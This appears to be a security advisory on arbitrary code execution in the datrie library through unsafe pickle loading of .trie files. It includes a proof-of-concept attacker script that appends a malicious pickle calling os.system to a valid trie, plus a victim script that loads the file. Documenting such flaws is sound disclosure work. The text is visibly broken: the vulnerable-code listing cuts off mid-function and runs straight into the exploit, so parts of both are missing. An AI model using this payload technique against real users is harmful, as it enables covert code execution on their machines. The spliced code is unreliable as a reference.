# Vulnerability Summary: datrie.Trie Arbitrary Code Execution ## 1. Vulnerability Overview The `Trie` class within the `datrie` library utilizes the unsafe `pickle.load()` method to deserialize internal data when loading `.trie` files via `Trie.load()`. The same vulnerability exists in the `Trie.read()` and `Trie.__setstate__()` methods. This allows attackers to craft malicious `.trie` files that trigger arbitrary Python code execution when a victim loads the file. ## 2. Scope of Impact * **Affected Package:** datrie * **Affected Versions:** All versions up to and including 0.8.3 * **CWE ID:** CWE-502 - Deserialization of Untrusted Data * **Severity:** Critical * **Impact:** Arbitrary Code Execution * **Researcher Name:** Dhabaleswar Das * **Discovery Date:** 2026-03-21 ## 3. Vulnerable Code The vulnerability primarily exists at the following three entry points: **1. Trie.__setstate__ (Line 678)** ```python def __setstate__(self, bytes_state): assert self._c_trie is NULL with tempfile.NamedTemporaryFile() as f: f.write(bytes_state) f.flush() f.seek(0) self._c_trie = _load_from_file(f) self._values = pickle.load(f) # /tmp/proof.txt' return (os.system, (cmd,)) evil_values = [Exploit()] evil_pickle_data = pickle.dumps(evil_values) # Step D: Combine into one file: valid trie + evil pickle with open('/tmp/evil_dictionary.trie', 'wb') as f: f.write(trie_binary_data) f.write(evil_pickle_data) print("Malicious file created: /tmp/evil_dictionary.trie") print("This file looks like a normal trie dictionary file.") print("When someone loads it, it will secretly run a command.") ``` **Victim Script (victim_app.py)** This script simulates a normal user loading a `.trie` file, triggering the vulnerability. ```python import datrie print("=== Normal Application ===") print("Loading dictionary file...") print() # This is what any normal user would do. # They received a .trie file and want to use it. # They have NO idea this will execute code. try: trie = datrie.Trie.load('/tmp/evil_dictionary.trie') print("Trie loaded. Keys:", list(trie.keys())) except Exception as e: print("Trie loading had an error:", e) print("BUT - check if the command already ran!") print() print("=== Checking if attacker's code executed ===") try: with open('/tmp/proof.txt', 'r') as f: content = f.read().strip() print("RESULT: VULNERABLE!") print("The file /tmp/proof.txt now contains:", content) print("The attacker's code ran just by loading a .trie file!") except FileNotFoundError: print("RESULT: Not vulnerable (proof file was not created)") ```